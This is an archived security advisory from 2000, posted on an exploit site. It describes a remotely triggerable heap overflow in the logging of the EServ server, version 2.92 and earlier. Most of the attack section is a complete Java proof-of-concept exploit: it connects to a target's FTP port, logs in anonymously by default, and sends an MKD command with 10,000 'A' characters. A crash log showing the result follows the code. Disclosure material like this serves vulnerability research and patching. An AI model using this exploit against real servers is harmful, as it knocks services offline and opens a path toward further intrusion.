what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mdma-6.eserv.txt

mdma-6.eserv.txt
Posted Jun 7, 2000
Authored by Wizdumb | Site subversion.za.org

MDMA Advisory #6 - EServ v2.92 and prior are vulnerable to a logging heap overflow vulnerability. Java proof of concept exploit code included.

tags | exploit, java, overflow, proof of concept
SHA-256 | 8f8294582a025b703fc4bcc38a6d47de57ed4735dddb9a13e1f4b02168d4ba63

mdma-6.eserv.txt

Change Mirror Download
MDMA Advisory #6 by Andrew Lewis aka. Wizdumb
EServ Logging Heap Overflow Vulnerability

EServ has problems handling long strings in its logging, which leads it to
have a remotely exploitable heap overflow. The following code, written in
Java coz it's my language of choice, demonstrates the vulnerability...

--------------------------------------------------------
/* Proof of concept code for the heap overflow in EServ <= 2.9.2
* Written 10/05/2000 by Andrew Lewis aka. Wizdumb [MDMA]
*/

import java.io.*;
import java.net.*;

class eservheap {

public static void main(String[] args) throws IOException {

if (args.length < 1) {
System.out.println("Syntax: java eservheap [host] <user> <pass>");
System.exit(1); }

Socket soq = null;
PrintWriter white = null;
BufferedReader weed = null;

try {
soq = new Socket(args[0], 21);
white = new PrintWriter(soq.getOutputStream(), true);
weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
} catch (Exception e) {
System.out.println("Problems connecting :-/");
System.exit(1); }

weed.readLine();
String juzer = (args.length == 3) ? ("USER " + args[1]) : "USER anonymous";
String pasz = (args.length == 3) ? ("PASS " + args[2]) : "PASS mdma";
white.println(juzer + "\n" + pasz);
weed.readLine();
weed.readLine();

white.print("MKD ");
for (int i = 0; i < 10000; i++) white.print("A");
white.println(); // uNf! Who yoh daddy, bitch?
weed.readLine();
white.println("QUIT"); } }
--------------------------------------------------------

And no, you don't need write access to the directory for that to work -- like
I said, The heap overflow occurs in the logging. :)

The following extract from e.log show the effect of this code...

----------------------------------------
27.05.2000 17:02:19 Eserv/2.92 2986 1
EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00
Pb4.6]N.Ñ_4..'..
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00
ÉÜ..A...HÑå.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00
.....F..._Ïå.#...

/* Ie. Thread crashes on MKD, but has no effect on other threads */

USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
1C5EE9C : 498BB9 C!
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS
/* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>
----------------------------------------

The vendor has been contacted some time ago, and despite recently having
disappeared, will probably have a fix for the problem out in the near future.
Hi's to Andrey Cherezov (the talented EServ author), everyone in MDMA, b0f,
Vortexia, b0g, and everyone who knows me.

Cheers,
Andrew Lewis aka. Wizdumb

PS. It may also be worth noting that EServ has the /con/con vulnerability and
that older versions shipped with a vulnerable version of Ultimate Bulletin
Board (See SerG's post in February).

wizdumb@leet.org
www.mdma.za.net/fk
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close